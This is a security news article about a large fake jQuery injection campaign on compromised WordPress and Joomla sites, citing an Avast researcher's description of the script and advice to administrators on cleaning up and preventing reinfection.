Historically, fake jQuery injections have been highly popular among cybercriminals, but the recently observed infection campaign has managed to compromise a very large number of domains, thus exposing millions of users to the malicious code.
With almost 70 million unique files on hacked websites containing the fake jQuery script, the infection has reached an abnormal high number of domains, Avast’s Alexej Savčin explains in a blog post. Starting in November, the security company has observed over 4.5 million users being exposed to these compromised websites, the researcher says.
According to Avast, the malicious code starts with a 10 milliseconds countdown, which is a common practice in injection-type coding, although a longer delay is more typical. Next, the special “encodeURIComponent” function is used almost in every line to encode special characters like: (, / ? : @ & = + $ #).
“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted. This URL is then used to increase SEO rank for other domains. Using referral page and backlinks makes it more valid,” Savčin explains.
Site Admins who have fallen victim to the infection are advised to start cleaning their computers first, as the root source of the infection might be on their local machine. Next, they should scan their website for compromised files and try to clean them, or delete all of them and replace them with a recent, clean backup (they should, however, be wary of deleting system files).
The issue with this type of compromise is that all files should be clean for the infection to be completely removed, as it would be reinstated if only one, even insignificant file is still compromised. Moreover, if the website is hosted on a server where other infected sites are hosted, chances are that the infection will spread to it as well.
After cleaning the website, administrators are also advised to update their WordPress or Joomla installation, as older versions are more susceptible to compromise. They should also perform regular backups of their website, to make sure they can easily restore it to a clean state in case of compromise.